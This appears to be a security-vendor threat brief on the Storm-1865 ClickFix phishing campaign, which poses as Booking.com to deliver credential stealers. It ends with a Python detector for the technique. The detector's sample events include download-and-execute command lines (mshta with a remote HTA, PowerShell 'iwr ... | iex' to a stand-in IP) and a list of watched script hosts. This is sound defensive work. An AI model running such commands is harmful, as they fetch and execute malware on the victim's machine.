Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry by masquerading as Booking.com communications. Initiated in December 2024, this campaign leverages a social engineering tactic known as ClickFix to disseminate credential-stealing malware.
The attack begins with emails sent to hospitality professionals across regions including North America, Oceania, South and Southeast Asia, and Europe. These emails, falsely claiming to be from Booking.com, notify recipients of a supposed negative guest review and request their feedback. Each message carries a link or a PDF attachment that appears to point to the legitimate Booking.com site.
Upon clicking, victims are led to a counterfeit CAPTCHA verification page designed to resemble Booking.com's interface. This page employs the ClickFix technique: it places a command on the user's clipboard and instructs them to open the Windows Run dialog (Win+R), paste the command, and execute it. The pasted command invokes the legitimate mshta.exe utility to download and run malware payloads such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Because the user, not an exploit, launches the script host, the activity originates from a signed Windows binary started from the user's own desktop session.
Previously, Storm-1865 targeted e-commerce customers with phishing messages leading to fraudulent payment sites. The adoption of the ClickFix method signifies an evolution in their tactics to bypass traditional security measures.
Source: The Hacker News
Analysis
The ClickFix social engineering technique emerged as a notable cyber threat in early 2024. The clever technique, which involves deceiving users into executing malicious commands on their systems by presenting fake error messages or prompts, has been adopted by various cybercriminals and advanced persistent threat (APT) groups to distribute malware.
Among these groups, hackers belonging to Russia's Main Intelligence Directorate (GRU), known as APT28, have incorporated ClickFix into their operations. Similarly, MuddyWater, an Iranian cyber espionage group linked to Iran's Ministry of Intelligence and Security, has utilized ClickFix to enhance their malware distribution strategies.
The adoption of ClickFix by such sophisticated actors underscores its effectiveness in bypassing traditional security measures and highlights the evolving landscape of social engineering tactics in cyber espionage.
Mitigation
Field Effect’s Security Intelligence team constantly monitors the cyber threat landscape for threats related to phishing. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate these threats. Field Effect MDR users are automatically notified when threat-related activity is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect portal.
To detect and prevent ClickFix style attacks, Field Effect recommends that organizations and individuals implement email security protections, such as anti-phishing filters and domain verification (DMARC, DKIM, SPF), to help block phishing emails before they reach inboxes.
Restricting the execution of risky scripting tools like mshta.exe and wscript.exe through Group Policy, AppLocker, or endpoint monitoring solutions like Field Effect MDR limits what a pasted ClickFix command can do; alerting on these binaries when they are launched from explorer.exe (the parent of anything run through the Win+R dialog) with a remote URL on the command line catches the technique at the moment of execution. Keeping software updated, including operating systems, browsers, and security tools, helps patch vulnerabilities that attackers might use to gain access, though ClickFix itself relies on the user running the command rather than on an unpatched vulnerability.
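The following is an added example, not code from the original article or from Field Effect, showing the detection logic the attack description and the mitigation above imply: flag process-creation events where a script host (mshta.exe or wscript.exe, as named on the page; powershell.exe, pwsh.exe and cscript.exe are added here as an assumption about common ClickFix variants) runs with a remote URL on its command line, and check the user's RunMRU registry history, which is where Windows records commands entered into the Win+R dialog. All event data, hostnames and paths are constructed for illustration and do not come from the campaign.

```python
import re

# Script hosts a ClickFix command typically hands the downloaded payload to.
# mshta.exe and wscript.exe come from the article; the rest are assumptions.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
# Event 0 is what a victim pasting the ClickFix command into Win+R produces; 1 and 3 are benign
# lookalikes (a legacy HTA app, notepad opened with a URL-looking argument); 2 is a PowerShell variant.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta https://booking-guest-feedback.example/verify.hta",
     "user": r"HOTEL\frontdesk"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\LegacyApp\app.exe",
     "command_line": r'mshta "C:\Program Files\LegacyApp\ui.hta"',
     "user": r"HOTEL\frontdesk"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iwr http://198.51.100.7/x.txt | iex"',
     "user": r"HOTEL\frontdesk"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe https://intranet.example/notes.txt",
     "user": r"HOTEL\frontdesk"},
]

# Constructed contents of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Each lettered value stores one Win+R command terminated by the two characters "\1";
# MRUList lists the letters most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "calc\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://booking-guest-feedback.example/verify.hta\\1",
}


def basename(path):
    """Lower-cased final path component, tolerating both slash styles."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event looks like ClickFix execution; an empty list means benign.

    A script host by itself is noisy (legacy HTA apps) and an explorer.exe parent by itself
    is normal (every double-clicked shortcut), so both a script host and a remote URL are
    required; the parent is reported as supporting context only.
    """
    img = basename(ev["image"])
    urls = URL_RE.findall(ev["command_line"])
    if img not in SCRIPT_HOSTS or not urls:
        return []
    reasons = [f"script host {img}", f"remote URL on command line: {urls[0]}"]
    if basename(ev["parent_image"]) == "explorer.exe":
        reasons.append("parent is explorer.exe, consistent with the Win+R Run dialog")
    return reasons


def flag_events(events):
    """Run score_event over a batch and return (event, reasons) pairs for the hits."""
    return [(ev, r) for ev in events if (r := score_event(ev))]


def suspicious_runmru(values):
    """Return Win+R history entries, most recent first, that call a script host with a remote URL."""
    hits = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw   # strip the "\1" terminator
        parts = cmd.split()
        if not parts:
            continue
        exe = basename(parts[0])
        if not exe.endswith(".exe"):
            exe += ".exe"   # Run dialog accepts "mshta" as well as "mshta.exe"
        if exe in SCRIPT_HOSTS and URL_RE.search(cmd):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for ev, reasons in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {ev['user']}: {ev['command_line']}")
        for r in reasons:
            print(f"    - {r}")
    for cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU artifact: {cmd}")
```

On a real host the process events would come from Sysmon or Windows Security event 4688 with command-line auditing enabled, and the RunMRU values from the victim user's NTUSER.DAT hive; the check above is deliberately strict (script host plus URL) so that legitimate HTA applications and local scripts do not generate alerts.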
Additionally, enabling multi-factor authentication (MFA) can prevent unauthorized account access, even if credentials are stolen in a phishing attack. By combining strong user education with technical defenses, individuals and organizations can significantly reduce their risk of falling victim to this evolving phishing technique.